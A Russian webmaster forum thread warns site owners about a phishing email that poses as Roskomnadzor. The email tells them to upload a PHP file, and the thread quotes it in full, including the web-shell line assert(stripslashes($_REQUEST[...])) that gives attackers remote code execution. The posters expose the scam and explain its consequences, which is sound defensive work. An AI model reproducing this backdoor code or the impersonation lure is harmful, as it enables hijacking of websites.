Владельцам сайтов, внимание мошенники!

garry

SEO
Пошли рассылки примерно такого содержания

Уведомление о внесении сайта в реестр организаторов распространения информации в сети «Интернет»

Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени *** в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт *** был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени ***, Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:

Код PHP:
< ?php
/*Подтверждение доменного имени ****/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>
*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: ***/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени ***, следую инструкции указанной выше, то Ваш сайт *** будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

-------------------
С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.
Если все проделать как в письме требуется, вы потеряете сайт, полный доступ и выполнение любых скриптов из переменной гарантированно.
Можно стать спамером и ваш сайт хостер закроет, можно рассылать вирусы и тд и тп.
Обратите внимание, это не единственный вариант обмана, при подозрении смотрите на отправителя и даже это можно подделать боле менее похоже или с подменой, можно смотреть в тело письма.
В любой почте можно посмотреть свойство письма, в том же яндексе и там в коде сразу все видно будет и через что шло и от кого и сервера и тд.

Kashchey

Копирайтер
Думаю, что такое письмо нельзя получить от Роскомнадзора в принципе.

garry

SEO
Kashchey said:
Тем не менее скидывают свои данные от банков, акков, счета и тд....
Не говоря о пирамидах :)

Kashchey

Копирайтер
Раннее утро.
Я только от отъехал, как услышал стук или лязг сзади. Остановился, заглушил авто, вышел, закрыл машину. Оказалось, что сзади привязаны банки! Краем глаза увидел, как некий молодой человек быстро уходит в противоположном направлении. Я крикнул:

- "Эй! Парень! Банки то забери, пригодятся ещё!"

Он ускорил шаг и скрылся за домом.

Интересно, неужели есть люди которые до сих пор ведутся на этот старый развод?... :D Может надо было предложить ему УТП от копирайтера?

Что бы я ему предложил? Ну например: создать свою передачу "Обман на дороге" или "Обманутый и смешной" Сначала Ютуб, а потом и телевидение.

Помните, что мошенники тоже люди. Им нужно кормить семью. Просто профессия другая. ;)

Что делать? Проверять информацию на официальных ресурсах.

http://rkn.gov.ru/news/rsoc/news34336.htm

margo-si

New Member
Такое письмо я получила буквально на прошлой неделе. Задавала вопрос на форуме.

Утром пришло оно, хотела сразу следовать инструкции дабы не заблокировали сайт. Буквально в обед того же дня, получила еще одно письмо от хостера, где было предупреждение о мошенниках. Предлагали также очистить сайт от вирусов, если рекомендации в письме уже были выполнены. В общем обошлось.

А так, спасибо Игорь, что создали отдельную тему, многим пригодиться.

margo-si

New Member
Kashchey said:
А если такие как я, которые и не знают что такое Роскомнадзор. Поведутся же. :(